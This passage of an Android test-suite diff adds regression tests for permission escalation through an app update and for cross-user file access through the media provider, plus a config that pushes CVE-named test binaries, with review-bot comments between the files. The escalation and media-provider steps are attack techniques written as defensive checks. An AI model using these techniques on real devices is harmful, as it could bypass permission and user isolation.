private static final String APK_22 = "CtsUsePermissionApp22.apk";
private static final String APK_23 = "CtsUsePermissionApp23.apk";
private static final String APK_24 = "CtsUsePermissionApp24.apk";
+ private static final String APK_DECLARE_NON_RUNTIME_PERMISSIONS =
+ "CtsDeclareNonRuntimePermissions.apk";
+ private static final String APK_ESCLATE_TO_RUNTIME_PERMISSIONS =
+ "CtsEscalateToRuntimePermissions.apk";
+
private IAbi mAbi;
private IBuildInfo mCtsBuild;
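Review bot: The new constant `APK_ESCLATE_TO_RUNTIME_PERMISSIONS` is misspelled, which makes it hard to find next to `ESCALATE_PERMISSION_PKG` and the `CtsEscalateToRuntimePermissions.apk` value it holds. Rename it to `APK_ESCALATE_TO_RUNTIME_PERMISSIONS` here and at its use in testNoPermissionEscalation in the last hunk of this file.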
@@ -55,14 +61,16 @@
assertNotNull(mAbi);
assertNotNull(mCtsBuild);
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
@Override
protected void tearDown() throws Exception {
super.tearDown();
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
public void testFail() throws Exception {
@@ -70,7 +78,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testFail");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -82,7 +90,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testKill");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -93,7 +101,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatDefault");
}
@@ -102,12 +110,12 @@
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part2");
}
@@ -115,63 +123,63 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testNoRuntimePrompt");
}
public void testDefault23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDefault");
}
public void testGranted23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGranted");
}
public void testInteractiveGrant23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testInteractiveGrant");
}
public void testRuntimeGroupGrantSpecificity23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantSpecificity");
}
public void testRuntimeGroupGrantExpansion23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantExpansion");
}
public void testCancelledPermissionRequest23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testCancelledPermissionRequest");
}
public void testRequestGrantedPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestGrantedPermission");
}
public void testDenialWithPrejudice23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDenialWithPrejudice");
}
@@ -179,11 +187,11 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part1");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part2");
}
@@ -191,51 +199,51 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part1");
fail("App must be killed on a permission revoke");
} catch (Throwable expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part2");
}
public void testRequestNonRuntimePermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonRuntimePermission");
}
public void testRequestNonExistentPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonExistentPermission");
}
public void testRequestPermissionFromTwoGroups23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestPermissionFromTwoGroups");
}
// public void testOnlyRequestedPermissionsGranted24() throws Exception {
// assertNull(getDevice().installPackage(
// MigrationHelper.getTestFile(mCtsBuild, APK_24), false, false));
-// runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest24",
+// runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest24",
// "testOnlyRequestedPermissionsGranted");
// }
public void testUpgradeKeepsPermissions() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testAllPermissionsGrantedByDefault");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testAllPermissionsGrantedOnUpgrade");
}
@@ -253,12 +261,12 @@
public void testNoResidualPermissionsOnUninstall() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part1");
- assertNull(getDevice().uninstallPackage(PKG));
+ assertNull(getDevice().uninstallPackage(USES_PERMISSION_PKG));
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part2");
}
@@ -266,28 +274,38 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testRevokePropagatedOnUpgradeOldToNewModel_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeOldToNewModel_part2");
}
public void testRevokePropagatedOnUpgradeNewToNewModel() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part1");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part2");
}
+ public void testNoPermissionEscalation() throws Exception {
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_DECLARE_NON_RUNTIME_PERMISSIONS), false, false));
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_ESCLATE_TO_RUNTIME_PERMISSIONS), true, false));
+ runDeviceTests(ESCALATE_PERMISSION_PKG,
+ "com.android.cts.escalatepermission.PermissionEscalationTest",
+ "testCannotEscalateNonRuntimePermissionsToRuntime");
+ }
+
private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
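Review bot: In testRevokePropagatedOnUpgradeOldToNewModel the `fail("App must be killed on a permission revoke")` call sits inside the `try` whose `catch (AssertionError expected)` is empty, so if `fail` is JUnit's (it throws an AssertionError subclass) the failure is swallowed and the test passes whether or not the app was killed. Since this commit already touches that call, record the outcome outside the try: set `killed = true` in the catch and follow the block with `assertTrue("App must be killed on a permission revoke", killed);`. Separately, the new constant `APK_ESCLATE_TO_RUNTIME_PERMISSIONS` is misspelled and should read `APK_ESCALATE_TO_RUNTIME_PERMISSIONS`, both here and at its declaration outside this hunk. The class's setUp/tearDown are also outside the hunk, so whether the package installed by testNoPermissionEscalation is uninstalled afterwards cannot be checked from here.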
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b98ba68
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_PACKAGE_NAME := CtsDeclareNonRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..411a66b
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="normal"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="signature"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application android:hasCode="false"/>
+
+</manifest>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b1b7f83
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/Android.mk
@@ -0,0 +1,35 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_STATIC_JAVA_LIBRARIES := android-support-test
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsEscalateToRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_PROGUARD_ENABLED := disabled
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..198bb39
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="dangerous"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application/>
+
+
+ <instrumentation
+ android:name="android.support.test.runner.AndroidJUnitRunner"
+ android:targetPackage="com.android.cts.escalate.permission" />
+
+</manifest>
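Review bot: This manifest has no comment saying that it deliberately redeclares STEAL_AUDIO1 and STEAL_AUDIO2 as `dangerous` under the same package name as the DeclareNotRuntimePermissions manifest, where they are `normal` and `signature`. A reader who sees only this file would take the protection levels for a mistake. Add a comment above the first `<permission>`, such as `<!-- Same permissions as the DeclareNotRuntimePermissions APK, redeclared as dangerous; installed as an update to check that the platform keeps the original protection level. -->`. The double blank line after `<application/>` can go as well.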
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
new file mode 100644
index 0000000..bd208bc
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/res/values/strings.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Just need this dummy file to force building Manifest.java. -->
+<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
+ <string name="keysets_perm_desc">keysets_perm_description</string>
+</resources>
diff --git a/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
new file mode 100644
index 0000000..bbe8e02
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/EscalateToRuntimePermissions/src/com/android/cts/escalatepermission/PermissionEscalationTest.java
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.cts.escalatepermission;
+
+import android.content.Context;
+import android.content.pm.PermissionInfo;
+import android.support.test.InstrumentationRegistry;
+import android.support.test.runner.AndroidJUnit4;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.assertSame;
+
+import com.android.cts.escalate.permission.Manifest;
+
+@RunWith(AndroidJUnit4.class)
+public class PermissionEscalationTest {
+ @Test
+ public void testCannotEscalateNonRuntimePermissionsToRuntime() throws Exception {
+ Context context = InstrumentationRegistry.getTargetContext();
+
+ // Ensure normal permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission1 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO1, 0);
+ assertSame("Shouldn't be able to change normal permission to dangerous",
+ PermissionInfo.PROTECTION_NORMAL, (stealAudio1Permission1.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+
+ // Ensure signature permission cannot be made dangerous
+ PermissionInfo stealAudio1Permission2 = context.getPackageManager()
+ .getPermissionInfo(Manifest.permission.STEAL_AUDIO2, 0);
+ assertSame("Shouldn't be able to change signature permission to dangerous",
+ PermissionInfo.PROTECTION_SIGNATURE, (stealAudio1Permission2.protectionLevel
+ & PermissionInfo.PROTECTION_MASK_BASE));
+ }
+ }
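Review bot: Both checks use `assertSame` on `int` values, which boxes each side and compares object identity; it passes only because the masked values are small enough to come from the Integer cache. Use `assertEquals("Shouldn't be able to change normal permission to dangerous", PermissionInfo.PROTECTION_NORMAL, stealAudio1Permission1.protectionLevel & PermissionInfo.PROTECTION_MASK_BASE);` with `import static org.junit.Assert.assertEquals;`, and do the same for the signature check. The second local is named `stealAudio1Permission2` although it holds STEAL_AUDIO2; `stealAudio2Permission` would read correctly.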
diff --git a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
index d9f00d2..3cf1443 100644
--- a/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MultiUserStorageApp/src/com/android/cts/multiuserstorageapp/MultiUserStorageTest.java
@@ -17,15 +17,20 @@
package com.android.cts.multiuserstorageapp;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertDirNoAccess;
+import static com.android.cts.externalstorageapp.CommonExternalStorageTest.assertFileNoAccess;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.getAllPackageSpecificPathsExceptObb;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.readInt;
import static com.android.cts.externalstorageapp.CommonExternalStorageTest.writeInt;
+import android.content.ContentResolver;
+import android.content.ContentValues;
+import android.net.Uri;
import android.os.Environment;
import android.test.AndroidTestCase;
import android.util.Log;
import java.io.File;
+import java.io.FileNotFoundException;
/**
* Test multi-user emulated storage environment, ensuring that each user has
@@ -138,6 +143,36 @@
}
}
+ /**
+ * Verify that files cannot be accessed through media provider.
+ */
+ public void testMediaProviderUserIsolation() throws Exception {
+ final File myPath = Environment.getExternalStorageDirectory();
+ final int myId = android.os.Process.myUid() / 100000;
+ assertEquals(String.valueOf(myId), myPath.getName());
+
+ Log.d(TAG, "My path is " + myPath + " user id " + myId);
+ final File basePath = myPath.getParentFile();
+ for (int i = 0; i < 128; i++) {
+ if (i == myId) continue;
+ final File otherPath = new File(basePath,i + "/" + FILE_SINGLETON);
+ assertFileNoAccess(otherPath);
+
+ final String URI_MEDIA_STRING = "content://media/external/audio/media/";
+ ContentResolver contentResolver = mContext.getContentResolver();
+ ContentValues cv = new ContentValues();
+ cv.put("_data", otherPath.getAbsolutePath());
+ contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);
+
+ try {
+ mContext.getContentResolver().openInputStream(Uri.parse(URI_MEDIA_STRING));
+ fail("Accessing through media provider should not be allowed. Path " + myPath);
+ } catch (FileNotFoundException expected) {
+ // OK
+ }
+ }
+ }
+
private File buildApiObbPath(String file) {
return new File(getContext().getObbDir(), file);
}
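Review bot: The `openInputStream` call in the loop opens `Uri.parse(URI_MEDIA_STRING)`, the audio collection URI, rather than the row that `contentResolver.insert(...)` just created, whose return value is discarded. The `FileNotFoundException` therefore probably comes from opening a collection, and the check says little about the other user's file. Keep the result, `final Uri inserted = contentResolver.insert(Uri.parse(URI_MEDIA_STRING), cv);`, and open that with `mContext.getContentResolver().openInputStream(inserted)`; a null or rejected insert can presumably count as a pass. The `fail` message should print `otherPath`, not `myPath`, and a stream that does open should be closed.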
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
